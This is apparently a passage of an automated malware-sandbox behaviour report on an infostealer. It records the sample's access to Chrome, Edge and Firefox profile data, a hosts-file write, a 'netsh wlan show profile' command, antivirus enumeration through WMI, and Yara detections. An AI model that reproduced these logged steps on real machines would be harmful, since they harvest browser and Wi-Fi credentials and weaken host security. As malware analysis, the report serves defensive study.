                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\a72670a9-643e-4e4e-b4d5-e6019a48f42a VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_BR | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat | VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0027CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime | 0_2_0027CBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_006D2517 GetTimeZoneInformation | 3_2_006D2517
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: 8ZVMneG.exe, 00000054.00000003.2967071098.00000000012EA000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000054.00000003.2967071098.00000000012D3000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000054.00000003.2967539041.00000000012EC000.00000004.00000020.00020000.00000000.sdmp; d0ef52de9f.exe, 0000005F.00000003.3030418791.00000000012D9000.00000004.00000020.00020000.00000000.sdmp; d0ef52de9f.exe, 0000005F.00000003.2960034570.0000000001338000.00000004.00000020.00020000.00000000.sdmp; d0ef52de9f.exe, 0000005F.00000003.2960705475.000000000132A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
Source: C:\Windows\System32\attrib.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: 2.2.skotes.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.skotes.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 89.2.skotes.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000003.2268719607.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2270058738.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000059.00000002.2787455438.0000000000691000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2205661447.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000059.00000003.2745055454.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2986166870.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2469304797.0000027326167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2469304797.0000027326165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2992431014.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2983797651.000001FA2EDC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: D1UL0FG.exe PID: 5160, type: MEMORYSTR
